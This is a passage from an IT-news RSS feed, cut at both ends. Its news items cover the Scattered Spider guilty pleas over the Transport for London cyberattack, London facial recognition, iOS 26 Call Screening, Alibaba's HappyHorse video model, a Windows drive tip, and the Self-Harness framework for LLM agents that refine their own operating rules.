href="https://thecyberexpress.com/scattered-spider-teens-plead-not-guilty/" target="_blank" rel="noopener">Scattered Spider </a>have pleaded guilty to their roles in the <a href="https://thecyberexpress.com/transport-for-london-addressing-cyberattack/" target="_blank" rel="noopener">Transport for London cyberattack</a>, an incident that disrupted services, exposed customer data, and resulted in approximately £29 million in losses and recovery costs for London's transport authority.

The guilty pleas were entered by Thalha Jubair, 20, from East London, and Owen Flowers, 18, from Walsall, West Midlands, on the opening day of proceedings at Woolwich Crown Court. The pair had been due to stand trial on June 22 but changed their pleas to guilty.
<h3><strong>Transport for London Cyberattack Led to Major Disruption</strong></h3>
According to the National Crime Agency (NCA) and City of London Police, TfL's network was infiltrated between August 31 and September 3, 2024. The breach forced all 28,000 employees to attend TfL offices for <a href="https://thecyberexpress.com/top-password-managers-for-digital-safety/" target="_blank" rel="noopener">password</a> resets and caused significant operational disruption across the organization.

The TfL cyberattack also resulted in unauthorized access to <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-is-data/" title="data" data-wpil-keyword-link="linked" data-wpil-monitor-id="28805">data</a> held within TfL's Oyster refunds system. The incident affected the authority's customer refund process, delaying reimbursements for some customers. In addition, the application system for Oyster photocards used by children and young people was temporarily shut down.

Authorities <a href="https://nca-newsroom.prgloo.com/news/cyber-criminals-who-hacked-into-transport-for-londons-computer-network-are-convicted" target="_blank" rel="nofollow noopener">said</a> the attack caused substantial financial damage, with TfL reporting losses and recovery costs totaling approximately £29 million.
<h3><strong>Investigation Linked Attackers to Scattered Spider</strong></h3>
Jubair and Flowers were arrested at their homes on September 16, 2024, following a joint investigation conducted by the <a href="https://thecyberexpress.com/nca-arrests-4-for-retail-cyberattacks/" target="_blank" rel="noopener">NCA</a> and City of London Police.

Investigators identified both individuals as members of Scattered Spider, a cybercriminal collective that has been linked to a number of high-profile intrusions.

During searches of Flowers' residence, officers recovered laptops, desktop computers, hard drives, and USB storage devices. Evidence recovered from one Acer laptop included a screenshot showing connectivity to TfL infrastructure.

[caption id="attachment_112868" align="aligncenter" width="600"]<img class="wp-image-112868 size-full" src="https://thecyberexpress.com/wp-content/uploads/TFL-cyberattack-e1782278063737.webp" alt="Transport for London cyberattack" width="600" height="900"> Source: NCA[/caption]

Authorities also found evidence indicating Flowers had accessed an online marketplace that sold breached credentials. Investigators further discovered videos recorded by Flowers that allegedly showed Jubair accessing TfL systems during the attack.

The investigation revealed that the two communicated through <a href="https://thecyberexpress.com/telegram-ban-in-india-ahead-of-neet-re-exam/" target="_blank" rel="noopener">Telegram</a> and collaborated using an online workspace platform that allowed multiple participants to work remotely on shared systems.
<h3><strong>Additional Allegations Involving US Healthcare Networks</strong></h3>
The investigation extended beyond the Transport for London <a class="wpil_keyword_link" href="https://cyble.com/cyberattack/" target="_blank" rel="noopener" title="cyberattack" data-wpil-keyword-link="linked" data-wpil-monitor-id="28806">cyberattack</a>. When Flowers was first arrested on September 6, 2024, NCA officers identified evidence suggesting unauthorized activity targeting the networks of SSM Health Care Corporation and Sutter Health in the United States.

Court records show Flowers pleaded guilty to charges related to a conspiracy to conduct unauthorized acts against SSM Health Care Corporation's computer systems with intent to impair operations. He also admitted attempting unauthorized acts against Sutter Health's systems with the same intent.

Jubair additionally faced a charge for failing to disclose PINs or passwords associated with devices seized during the investigation.

Authorities noted that Flowers breached bail conditions on two occasions in March and May 2025.
<h3><strong>Law Enforcement Highlights Impact of Cybercrime</strong></h3>
Paul Foster, Deputy Director and head of the NCA's National <a class="wpil_keyword_link" href="https://thecyberexpress.com/" title="Cyber Crime" data-wpil-keyword-link="linked" data-wpil-monitor-id="28803">Cyber Crime</a> Unit, described the case as a lengthy and highly complex investigation. He said the attack demonstrated that <a class="wpil_keyword_link" href="https://cyble.com/cybercrime/" target="_blank" rel="noopener" title="cybercrime" data-wpil-keyword-link="linked" data-wpil-monitor-id="28804">cybercrime</a> has significant real-world consequences, affecting public services and causing millions of pounds in losses to critical national infrastructure.

Foster also highlighted the growing threat posed by cybercriminal groups operating from the UK and other English-speaking countries, citing Scattered Spider as a notable example.

Deputy Commissioner Nik Adams of the City of London Police said the cyberattack had a significant impact on essential public services and daily operations. He emphasized that individuals responsible for targeting critical organizations and causing financial harm would be pursued through coordinated law enforcement efforts.

The investigation received support from the West Midlands Regional Organised Crime Unit and British Transport Police.

Jubair and Flowers are scheduled to be sentenced at Woolwich Crown Court on July 16.]]></content:encoded>
</item>
<item>
<title><![CDATA[Met to expand use of live facial recognition into central London by Christmas]]></title>
<description><![CDATA[Technology to be used in six more areas next year as critics say tens of thousands of people will be forced into ‘digital police lineup’The Metropolitan police is to expand its use of live facial recognition (LFR) technology, first into London’s West End by Christmas and then into a further six a...]]></description>
<link>https://tsecurity.de/de/3617464/it-nachrichten/met-to-expand-use-of-live-facial-recognition-into-central-london-by-christmas/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3617464/it-nachrichten/met-to-expand-use-of-live-facial-recognition-into-central-london-by-christmas/</guid>
<pubDate>Tue, 23 Jun 2026 09:17:52 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Technology to be used in six more areas next year as critics say tens of thousands of people will be forced into ‘digital police lineup’</p><p>The Metropolitan police is to expand its use of live facial recognition (LFR) technology, first into London’s West End by Christmas and then into a further six areas next year.</p><p>The new cameras will be fixed, and could be attached to street furniture such as lamp-posts. Critics said the new plans mean tens of thousands of people will be forced into a “digital police lineup”.</p> <a href="https://www.theguardian.com/technology/2026/jun/23/met-to-expand-live-facial-recognition-central-london">Continue reading...</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[iOS 26 Call Screening for Businesses: A New Challenge?]]></title>
<description><![CDATA[One of the main changes to phone communication lately is coming in Apple’s iOS 26. The feature is called Call Screening, and it is meant to give users more control over incoming calls. How? By automatically answering calls from unknown numbers, asking callers to identify themselves and explain wh...]]></description>
<link>https://tsecurity.de/de/3617218/ios-mac-os/ios-26-call-screening-for-businesses-a-new-challenge/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3617218/ios-mac-os/ios-26-call-screening-for-businesses-a-new-challenge/</guid>
<pubDate>Tue, 23 Jun 2026 06:38:27 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[One of the main changes to phone communication lately is coming in Apple’s iOS 26. The feature is called Call Screening, and it is meant to give users more control over incoming calls. How? By automatically answering calls from unknown numbers, asking callers to identify themselves and explain why they are calling, and then notifying the iPhone user.



What a relief for all the consumers out there who are tired of spam calls, robocalls, and scams. But for companies that rely on talking on the phone, the feature is a new challenge.



Let’s see how the iOS 26 Call Screening actually works and whether it is really so useful.



What is the iOS 26 Call Screening Feature?



Call Screening is a built-in feature present in iOS 26 that screens unknown calls before forwarding them to the recipient. The device automatically answers an incoming call from a number not in the user’s contacts, without disturbing the user. The caller is then asked his name and the reason for his call.



When the recipient answers, the information is displayed to the user, and the iPhone calls the device. The user can see the call explanation and decide whether to answer, ignore, or send it to voicemail.



Why Apple Introduced Call Screening



The reason for developing this feature is very simple: to filter and block unwanted callers.



Each year, consumers receive more than 50 billion robocalls, spam calls, and other fraudulent calls. The first thing many people do when they see an unknown number calling is to quickly look up the caller online. This technique takes time and requires some dexterity.



As a result, people easily omit legitimate calls.



That is why Apple introduced its iOS 26 Call Screening feature. This solution enables quick caller qualification. What you receive in return is context—the thing that is often out of sight when browsing a website on the Internet.



With Call Screening, you get fewer interruptions from spammers and can take back control over incoming calls. A really useful thing for individuals tired of unwanted spam and scam calls.



How Businesses Can Extend Their Call Screening



For businesses that often rely on the phone to communicate with clients, MightyCall offers additional features that go along with Apple’s Call Screening. Relying on a professional all-in-one solution for call centers builds more credibility to avoid being filtered as a potential robocall.



Companies can organize caller IDs across all teams so that the recipients do not flag specific numbers as spam. Scalability allows adaptability as screening methods can change over time. A unified approach to the new feature helps businesses make their calls legitimate to the customer.



What This iOS Feature Means for Business



Call Screening was designed with the consumer in mind, but it has important implications for business. The challenge is simple: you have to build trust before the conversation starts.



In the past, a sales rep, support agent, or healthcare provider could introduce themselves after the recipient answered. Call Screening is on, and the caller must provide enough information during the screening process to convince the recipient that the call is worth answering.



This adds yet another decision point where legitimate business calls could be blocked.



For example, if a client expects a callback from your company, but the call comes from an unfamiliar number, it might trigger screening. As a result, this customer could ignore the call, leading to bad experiences.



Tips for Businesses to Adapt to the New Reality



Companies that will thrive in a screened-calling world are those willing to adjust their communication strategies. Businesses can start to think of Call Screening not as a block but a step in the customer journey. 



A screened intro is essentially a micro-message. Now, the first impression is the explanation the caller receives before a live conversation even takes place. While Call Screening should not damage the classic cold calling, sales teams must focus on tracking performance metrics. Looking at answer rates, caller reputation, contact quality, and message effectiveness will help identify where friction occurs.



The Future of Business Phone Outreach



Apple’s Call Screening feature is part of a broader trend. Users want more control over who can contact them. This means less disruption for consumers and more confidence in answering the phone.



However, businesses are now forced to build trust earlier in the clients’ journeys. The ones that succeed will not be making the most calls. Instead, winners will be offering clear identification, relevant messaging, and professional communication approaches.



Enabling Call Screening is not the end of business. It is yet another filter for credibility in a customer-first landscape. The sooner you accept this reality, the more effective your B2C communications will become.]]></content:encoded>
</item>
<item>
<title><![CDATA[Alibaba's AI video model rises to No. 2 in global rankings, as OpenAI's Sora and ByteDance's Seedance fall away]]></title>
<description><![CDATA[Alibaba Cloud on Sunday released HappyHorse 1.1, a major upgrade to its AI video generation model that the company says delivers production-ready video synthesis across core content creation scenarios. The model is now live on Alibaba Cloud Model Studio with full API access for enterprise custome...]]></description>
<link>https://tsecurity.de/de/3616637/it-nachrichten/alibabas-ai-video-model-rises-to-no-2-in-global-rankings-as-openais-sora-and-bytedances-seedance-fall-away/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3616637/it-nachrichten/alibabas-ai-video-model-rises-to-no-2-in-global-rankings-as-openais-sora-and-bytedances-seedance-fall-away/</guid>
<pubDate>Mon, 22 Jun 2026 23:03:25 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><a href="https://www.alibabacloud.com/en?_p_lc=1">Alibaba Cloud</a> on Sunday released <a href="https://www.happyhorse.com/">HappyHorse 1.1</a>, a major upgrade to its AI video generation model that the company says delivers production-ready video synthesis across core content creation scenarios. The model is now live on <a href="https://modelstudio.alibabacloud.com/">Alibaba Cloud Model Studio</a> with full API access for enterprise customers and developers, accompanied by a 40% sitewide launch discount for the first two weeks.</p><p>The release arrives at a moment of remarkable upheaval in the AI video generation market — and Alibaba appears keenly aware of the timing. OpenAI <a href="https://help.openai.com/en/articles/20001152-what-to-know-about-the-sora-discontinuation">discontinued Sora</a> after it proved financially unsustainable. ByteDance <a href="https://www.cnbc.com/2026/03/17/bytedance-seedance-shut-down-tiktok-marsha-blackburn-peter-welch.html">indefinitely shelved</a> the international rollout of Seedance 2.0 following a barrage of copyright complaints from Hollywood studios. For enterprise procurement teams that had been evaluating or integrating those tools into marketing, advertising, and content production workflows, the competitive landscape has contracted sharply in a matter of months.</p><p>That contraction creates both an opportunity and a test for Alibaba. HappyHorse 1.1 is not a research demo or a consumer toy — it is an API-first product built for integration into enterprise software stacks, priced for volume, and backed by a $52.7 billion global infrastructure buildout. Whether it can convert technical capability into enterprise adoption, particularly in Western markets navigating intensifying U.S.-China tech tensions, will determine whether Alibaba can establish itself as a serious player in the generative video market that analysts expect to reach tens of billions of dollars by the end of the decade.</p><h2><b>How HappyHorse climbed from anonymous benchmark entry to top-ranked video model</b></h2><p><a href="https://www.happyhorse.com/">HappyHorse</a> first appeared in early April as an anonymous submission on the <a href="https://x.com/arena/status/2044977389185482998">Artificial Analysis Video Arena</a>, an independent benchmarking platform where real users compare model outputs in blind, side-by-side evaluations. The model immediately claimed the top position in both text-to-video and image-to-video rankings. Alibaba was subsequently confirmed as the creator, revealing it was built by the company's ATH (Alibaba Token Hub) AI Innovation Unit — a team previously part of the Future Life Lab under the Taobao and Tmall Group before a strategic organizational restructuring.</p><p>According to <a href="http://arena.ai/">Arena.ai</a>, HappyHorse 1.0 now holds the No. 2 position across all three Video Arena leaderboards. The platform noted the model scores 1,444 in both text-to-video and image-to-video categories, leading Google's Veo-3.1 (with audio) by 69 points in text-to-video and xAI's Grok-Imagine-Video by 23 points in image-to-video. In Elo-based ranking systems like Arena's, models gain or lose points based on whether users prefer their outputs in head-to-head comparisons, meaning persistent double-digit leads reflect a consistent quality gap as perceived by human evaluators — not a statistical fluke.</p><p>The model's architecture helps explain why. According to community-compiled technical documentation, HappyHorse is built around a 15-billion-parameter unified self-attention Transformer that processes text, image, video, and audio tokens within a single token sequence. Unlike many competitors that stitch together separate models for video and audio, HappyHorse operates as a unified system that handles all modalities in a single generation pass, eliminating the need for third-party dubbing or post-processing audio tools. For enterprise buyers evaluating total cost of ownership, that architectural simplicity translates directly into fewer integration points, fewer vendor dependencies, and faster time to production.</p><h2><b>What the 1.1 upgrade fixes — and why it matters for commercial video production</b></h2><p>The 1.1 upgrade targets a set of pain points that enterprise video production teams know intimately. <a href="https://www.alibabacloud.com/en?_p_lc=1">Alibaba Cloud</a> described the release as "systematically optimized across core content generation scenarios," and the specific improvements reveal a model that has been tuned for commercial deployment rather than viral social media demos.</p><p>The most consequential upgrade is multi-image reference capability, which Alibaba calls R2V (Reference-to-Video). The feature allows users to upload multiple character reference images and maintain consistent identity across generated video — directly addressing one of the hardest problems in AI video production, where subjects tend to drift in appearance between frames or shots. For brands producing advertising campaigns, product videos, or serialized marketing content, identity consistency is not a nice-to-have; it is a requirement that has historically forced teams back to traditional production methods.</p><p>Motion quality receives a significant overhaul, with what Alibaba describes as "strengthened motion modeling" that addresses prior limitations in speed and fluidity. The company also made targeted improvements to visual texture, specifically calling out the elimination of "facial oiliness," "over-sharpening," and "unnatural textures" — artifacts that have plagued commercial AI video since the technology emerged and that immediately signal to viewers that content is machine-generated.</p><p>Two additional upgrades round out the release. <a href="https://www.happyhorse.com/">HappyHorse 1.1</a> improves audio-visual synchronization, including what Alibaba claims is "zero-drift lip sync" for dialogue scenes and context-aware speech pacing — building on the 1.0 version's already notable ability to generate up to 15 seconds of 1080p video with synchronized audio output. The model also improves instruction-following for long and complex prompts, a critical differentiator for enterprise users who need to specify precise camera movements, lighting conditions, and narrative beats in a single generation pass rather than iterating through dozens of attempts.</p><h2><b>Sora's collapse and Seedance's freeze leave enterprise buyers with fewer choices than ever</b></h2><p>The competitive context surrounding this launch is unusually favorable for Alibaba, and it is worth understanding why.</p><p>OpenAI's Sora web and app experiences were <a href="https://help.openai.com/en/articles/20001152-what-to-know-about-the-sora-discontinuation">discontinued on April 26</a>, with the Sora API set to follow on September 24. The shutdown came after the product proved financially untenable: Sora cost roughly $1 million per day to operate but generated only about $2.1 million in total revenue, while active users dropped from a peak near 1 million to under 500,000. For enterprise teams that had integrated Sora into production pipelines, the abrupt withdrawal underscored the risks of depending on AI products that lack a sustainable business model — a cautionary tale that procurement officers are unlikely to forget quickly.</p><p>ByteDance's <a href="https://seed.bytedance.com/en/seedance2_0">Seedance 2.0</a>, which many considered Sora's most formidable successor, ran into a different kind of wall. Netflix, Warner Bros., Disney, Paramount, and Sony sent legal threats to ByteDance over allegations of systematic copyright infringement after users generated viral clips featuring Hollywood intellectual property. <a href="https://techcrunch.com/2026/03/15/bytedance-reportedly-pauses-global-launch-of-its-seedance-2-0-video-generator/">ByteDance indefinitely postponed</a> the international launch, and the global rollout remains suspended.</p><p>That leaves <a href="https://blog.google/innovation-and-ai/technology/ai/veo-3-1-lite/">Google's Veo 3.1</a> as the primary Western competitor in the enterprise video generation space. But Alibaba's Arena rankings suggest HappyHorse is outperforming Veo on user-perceived quality, and the 40% launch discount on Alibaba Cloud Model Studio could make HappyHorse significantly cheaper at scale. At the 1.0 level, pricing through third-party API platforms ran roughly $1.82 per 10-second clip at 720p and $3.12 at 1080p. With the promotional pricing, HappyHorse 1.1 could bring production-quality AI video generation within reach of mid-market companies and agencies that previously considered the technology too expensive for anything beyond experimentation.</p><h2><b>Alibaba's $52.7 billion infrastructure bet gives HappyHorse a distribution advantage rivals can't match</b></h2><p><a href="https://www.happyhorse.com/">HappyHorse 1.1</a> does not exist in isolation. It sits atop a global infrastructure offensive that distinguishes Alibaba from pure-play AI model companies that build impressive technology but lack the physical and commercial machinery to serve regulated enterprise customers at scale.</p><p>Just five days before the HappyHorse 1.1 launch, <a href="https://www.alibabacloud.com/en?_p_lc=1">Alibaba Cloud</a> opened its first data centers in France, establishing its third European hub after Germany and the United Kingdom. The Paris region features two availability zones, bringing the company's global footprint to 105 availability zones across 32 regions. "The expansion of our cloud infrastructure into France reinforces our ongoing commitment to empowering European businesses with sovereign, secure, and intelligent solutions," said Dr. Feifei Li, Alibaba Cloud's CTO and president of international business, in the company's announcement. In Japan, the company opened its fifth data center in Tokyo on June 19.</p><p>As reported by <a href="https://www.datacenterdynamics.com/en/news/alibaba-cloud-launches-france-region/">Data Center Dynamics</a>, CEO Eddie Wu has committed to investing $52.7 billion in building a "unified global cloud network," with the company later considering increasing this to $69 billion. This year alone, Alibaba has launched new regions in Mexico, Thailand, Malaysia's Johor, and France. The France deployment is also part of Alibaba Cloud's plan to roll out enterprise-grade agentic AI services across Europe in the second half of the year, including <a href="https://help.aliyun.com/en/functioncompute/fc/what-is-agentrun">AgentRun</a> (a development platform for AI agents), <a href="https://help.aliyun.com/en/starops/product-overview/introduction-of-starops">STAROps</a> (an intelligent operations platform), and <a href="https://www.alibabacloud.com//blog/one-click-openclaw-deployment-building-enterprise-grade-ai-agent-applications-with-acs-agent-sandbox_602980/_____tmd_____/punish?x5secdata=xcybsQIh5Cown%2FWZGmvZM4R8tzrKeLy38z%2BxF39tV8%2FJwaQbn3Vu7Pb7GOOHfHTc9jfWBSal7fUMFaPB4md90IQbPqDwo4rlivLRDyLVfZwpl0vKVA7dwDSrf6Scw4ClRD9ZUte6ZkHtjGJxj2KB%2F4rQdKygWtukQNfv494%2FgbCGHwYB5Pg08kF18V9%2BYRULrQ6hp2PCkXtH%2F3pVnvORQU3ViffPPs%2Fa1PN%2FDb4vdHSw5EdZZoZdHfv15xALfTrN4w__bx__www.alibabacloud.com%2Fblog%2Fone-click-openclaw-deployment-building-enterprise-grade-ai-agent-applications-with-acs-agent-sandbox_602980&amp;x5step=1">ACS Agent Sandbox</a> (which provides hardware-level security isolation for agent workloads).</p><p>The infrastructure buildout serves a dual purpose for a product like <a href="https://www.happyhorse.com/">HappyHorse</a>. Running a 15-billion-parameter video generation model with integrated audio is extraordinarily compute-intensive, and having local infrastructure reduces latency for enterprise API calls while keeping customer data within regulatory boundaries. For European buyers operating under the European Commission's new tech sovereignty framework — published June 3 with the explicit goal of protecting the bloc's "digital independence" — the ability to run AI video generation workloads on locally hosted infrastructure is not a luxury. It is increasingly a compliance requirement.</p><h2><b>The Pentagon listing and geopolitical risk loom over Alibaba's Western ambitions</b></h2><p>Alibaba's global push is unfolding under significant geopolitical headwinds that enterprise buyers cannot afford to ignore. The <a href="https://www.cnbc.com/2026/06/09/alibaba-baidu-byd-named-on-pentagons-china-military-list-.html">Pentagon added Alibaba</a>, along with BYD and Baidu, to its list of Chinese military companies on June 8, preventing them from securing U.S. defense contracts. Alibaba rejected the designation, saying it is "not a Chinese military company nor part of any military-civil fusion strategy."</p><p>The listing does not automatically trigger sanctions, and it does not directly restrict commercial transactions between private U.S. companies and Alibaba. But it adds a layer of reputational and regulatory complexity to procurement decisions, particularly for companies with U.S. government exposure, defense supply chain connections, or transatlantic operations. Enterprise technology purchases are rarely evaluated on technical merit alone — vendor risk assessments, board-level compliance reviews, and geopolitical scenario planning all factor into buying decisions for cloud infrastructure and AI tooling.</p><p>For European customers specifically, the calculus is layered in a different way. The continent's growing emphasis on digital sovereignty cuts in two directions simultaneously: it creates demand for alternatives to the dominant U.S. hyperscalers (<a href="https://aws.amazon.com/">Amazon Web Services</a>, <a href="https://azure.microsoft.com/en-us">Microsoft Azure</a>, and <a href="https://cloud.google.com/">Google Cloud</a> control roughly 70 percent of European cloud infrastructure revenue, according to Synergy Research Group), but it also raises questions about whether a Chinese provider represents a meaningful improvement in strategic autonomy. Alibaba's strategy of building sovereignty-compliant infrastructure in-market is a direct attempt to answer that question — but the Pentagon listing ensures it will be asked repeatedly.</p><h2><b>What enterprise teams should watch as the AI video market consolidates</b></h2><p>The practical implications of <a href="https://www.happyhorse.com/">HappyHorse 1.1</a> for enterprise teams are substantial. HappyHorse supports four modes of generation — text-to-video, image-to-video, subject-to-video, and the newly added video editing — covering the full spectrum of commercial video needs from ideation through production to post-production, all with integrated audio at no additional cost. That breadth of capability, delivered through a single API endpoint, simplifies what has historically been a fragmented and expensive production pipeline.</p><p>The question going forward is whether Alibaba can convert benchmark dominance and competitive timing into durable enterprise relationships. The company plans to release HappyHorse through Alibaba Cloud Model Studio with full enterprise SLAs, security certifications, and regional compliance — the table stakes that separate research breakthroughs from production-grade services. Watch for customer disclosures, usage metrics, and whether third-party platforms like fal.ai and Atlas Cloud (which already host HappyHorse 1.0) update to the 1.1 version quickly, which would signal genuine developer demand beyond Alibaba's own ecosystem.</p><p>The AI video generation market entered 2026 with three credible enterprise contenders. One is dead. One is frozen. And the one still standing is a Chinese company backed by $52.7 billion in infrastructure spending, ranked No. 2 across every major independent benchmark, and offering a 40% discount to anyone willing to place the bet. In enterprise technology, the best product does not always win — but it rarely loses when the competition has already left the field.</p><p>
</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[External hard drive not recognized after force eject]]></title>
<description><![CDATA[Does your Windows computer not recognize the drive after a forced eject? We get how frustrating it can be. This issue stems from file system errors or corrupted drivers that are caused by the abrupt disconnection. In this article, we see what to do if the External hard drive is not recognized aft...]]></description>
<link>https://tsecurity.de/de/3616205/windows-tipps/external-hard-drive-not-recognized-after-force-eject/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3616205/windows-tipps/external-hard-drive-not-recognized-after-force-eject/</guid>
<pubDate>Mon, 22 Jun 2026 19:11:06 +0200</pubDate>
<category>🪟 Windows Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="700" height="300" src="https://www.thewindowsclub.com/wp-content/uploads/2026/06/external-hard-disk-not-recognized.png" class="attachment-full size-full wp-post-image" alt="External hard drive is not recognized" decoding="async" fetchpriority="high" srcset="https://www.thewindowsclub.com/wp-content/uploads/2026/06/external-hard-disk-not-recognized.png 700w, https://www.thewindowsclub.com/wp-content/uploads/2026/06/external-hard-disk-not-recognized-500x214.png 500w, https://www.thewindowsclub.com/wp-content/uploads/2026/06/external-hard-disk-not-recognized-300x129.png 300w" sizes="(max-width: 700px) 100vw, 700px">Does your Windows computer not recognize the drive after a forced eject? We get how frustrating it can be. This issue stems from file system errors or corrupted drivers that are caused by the abrupt disconnection. In this article, we see what to do if the External hard drive is not recognized after force eject. […]</p>
<p>This article <a href="https://www.thewindowsclub.com/external-hard-drive-not-recognized-after-force-eject">External hard drive not recognized after force eject</a> first appeared on <a href="https://www.thewindowsclub.com/">TheWindowsClub.com</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Researchers introduce Self-Harness, a framework that lets AI agents rewrite their own rules, boosting performance up to 60%]]></title>
<description><![CDATA[Not every company can or should build their own frontier AI language model. However, the harness controlling the model is something that most enterprises can and should customize for their specific purposes.Of course, this is easier said than done. Agent harnesses are still largely tuned through ...]]></description>
<link>https://tsecurity.de/de/3616014/it-nachrichten/researchers-introduce-self-harness-a-framework-that-lets-ai-agents-rewrite-their-own-rules-boosting-performance-up-to-60/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3616014/it-nachrichten/researchers-introduce-self-harness-a-framework-that-lets-ai-agents-rewrite-their-own-rules-boosting-performance-up-to-60/</guid>
<pubDate>Mon, 22 Jun 2026 17:48:04 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Not every company can or should build their own frontier AI language model. However, the <i>harness</i> controlling the model is something that most enterprises can and <i>should</i> customize for their specific purposes.</p><p>Of course, this is easier said than done. A<!-- -->gent harnesses are still largely tuned through manual, ad hoc debugging — a process that relies heavily on intuition rather than systematic feedback loops, making it difficult to keep pace with rapidly evolving LLMs.</p><p>To solve this challenge, researchers at the Shanghai Artificial Intelligence Laboratory have introduced “<a href="https://arxiv.org/abs/2606.09498">Self-Harness</a>,” a new paradigm in which an LLM-based agent systematically improves its own operating rules. By examining its own execution traces to apply edits, the system trades manual guesswork for empirical evidence.</p><p>Self-improving harnesses can enable development teams to deploy robust custom agents that continually adapt their own execution protocols to overcome model-specific weaknesses.</p><h2><b>The challenge of harness engineering</b></h2><p>An LLM-based agent's performance is not determined solely by its underlying base model, but also by its harness: the surrounding system that provides context and enables the model to interact with the environment. A harness includes components like system prompts, tools, memory, verification rules, runtime policies, orchestration logic, and failure-recovery procedures.</p><p>This layer is crucial because many common agent failures stem from the harness rather than the model. For example, an agent may report success without checking the model’s response (e.g., running the code to see if it passes the tests), or it might retry a failed action repeatedly. The harness is also responsible for preventing <a href="https://venturebeat.com/ai/mits-new-recursive-framework-lets-llms-process-10-million-tokens-without">context rot or overload</a> when the agent’s interaction history grows very large. Examples of popular harnesses include SWE-agent, Claude Code, Codex, and OpenHands.</p><p>Harness engineering remains a significant challenge, but the bottleneck isn't necessarily that humans are too slow or incapable. </p><p>In fact, Hangfan Zhang, lead author of the Self-Harness paper, told VentureBeat that "in many cases, an experienced engineer with deep domain knowledge can still propose better changes than an LLM can today."</p><p>Instead, the true bottleneck of manual engineering is that it relies heavily on ad hoc debugging rather than a verifiable, empirical feedback loop. "The deeper issue is that the current harness-engineering paradigm often lacks a systematic feedback loop," Zhang explained. "Many edits are made based on intuition, a few observed failures, or ad hoc debugging."</p><p>With new models being released at a rapid pace, depending on human intuition to manually tune model-specific harnesses becomes increasingly costly and untenable. While some approaches use stronger models to improve the harnesses of weaker target agents, this dependence on external guidance has its own challenges, as these models may be costly, unavailable for frontier models, or mismatched to the target model's failure modes.</p><h2><b>How Self-Harness works</b></h2><p>The Self-Harness paradigm enables an LLM-based agent to improve its own harness without relying on human engineers or stronger external models.</p><p>This continuous self-evolution is driven by a three-stage iterative loop that turns behavioral evidence into harness updates:</p><ul><li><p><b>Weakness mining:</b> Starting from an initial harness, the agent runs a set of tasks, producing execution traces with verifiable outcomes. The agent categorizes failed traces and tries to detect model-specific failure patterns.</p></li><li><p><b>Harness proposal:</b> Based on these failure patterns, the agent uses a “proposer” role to generate a set of diverse yet minimal harness modifications, each tied to a specific failure mechanism to avoid overly general corrections.</p></li><li><p><b>Proposal validation:</b> The system evaluates candidate modifications through regression tests. An edit is promoted only if it improves performance without causing measurable degradation on held-out tasks. If multiple candidate modifications pass the regression tests, they are merged into the next version of the harness, which then serves as the starting point for the next iteration.</p></li></ul><p>To visualize why an enterprise would need this, imagine an automated issue-fixing agent that reads internal documentation, writes patches, and opens pull requests. If the company updates its documentation style, the agent might suddenly fail, pulling the wrong context or writing bad patches. </p><p>On the surface, the agent simply looks broken. But Self-Harness turns this ambiguous failure into a solvable problem. "The failure traces expose where the agent is misusing the new documentation format; the proposer can generate a targeted harness edit... and the evaluator can decide whether that edit improves the failing cases without regressing other cases," Zhang said.</p><h2><b>Self-Harness in action</b></h2><p>The researchers evaluated Self-Harness on <a href="https://www.tbench.ai/">Terminal-Bench-2.0</a>, a benchmark that tests general tool-based execution, including artifact management, command use, verification behavior, and recovery from execution errors. They applied Self-Harness with MiniMax M2.5, Qwen3.5-35B-A3B, and GLM-5.</p><p>To isolate the impact of the self-evolving harness, they started with a minimal harness built upon the DeepAgent SDK, containing only the benchmark-facing system prompt, and the default filesystem and shell tools. The model backend, tool set, benchmark environment, and evaluator were kept unchanged while only the harness was allowed to vary.</p><p>The quantitative results show that <b>agents improved their performance through automated harness edits. </b>On held-out tasks, <b>performance jumped significantly across the board, ranging from 33 to 60 percent </b>relative improvements for different models.</p><p>Importantly, an explicit acceptance rule promotes only those edits that improve performance without introducing unacceptable regressions. What makes Self-Harness powerful for enterprise applications is that it doesn’t simply make the prompt longer or add generic instructions. Instead, it introduces targeted changes that reflect the recurring problems each model encounters during execution.</p><p>For example, under the baseline harness, MiniMax M2.5 would get stuck endlessly exploring dataset configurations until the execution environment timed out, failing to produce any deliverables. Through Self-Harness, the system identified this specific flaw and wrote a "loop breaker" into its runtime policy, forcing the agent to stop and redirect its approach after 50 tool calls. It also added a rule to create an initial version of required artifacts as early as possible.</p><p>On the other hand, Qwen-3.5 had a habit of hitting a file overwrite error and then blindly retrying the same command repeatedly, eventually deleting necessary files out of confusion before stopping. The self-harness fixed this by introducing a strict command-retry discipline (forbidding exact duplicate commands) and a mechanism that forced the agent to immediately recreate any missing artifacts if a file error occurred.</p><p>GLM-5 struggled to preserve environment changes across different commands, and would often waste time on massive downloads or finalize tasks even when sanity checks were failing. Its self-generated harness introduced rules instructing the agent to persist PATH variables across shell sessions, limit external compute, and repair any failed sanity checks before concluding its run.</p><h2><b>The hidden costs of automated harnesses</b></h2><p>While Self-Harness automates the tedious work of tracking down idiosyncratic model failures, decision-makers must be realistic about the trade-offs. Replacing human engineering with automated trial-and-error requires significant computational overhead.</p><p>"Self-Harness replaces part of the human engineering burden with repeated proposal generation, parallel candidate evaluation, and regression testing," Zhang said. "That can mean more API tokens, more latency during optimization, and more infrastructure for running evaluation tasks."</p><p>Also, this system relies on the accuracy of its evaluation pipeline. During their experiments on Terminal-Bench-2.0, the researchers relied on strict, deterministic verifiers to ensure the agent's edits were actually helpful. Without this rigorous ground truth, an automated system risks promoting bad updates. "[The] evaluation system is not 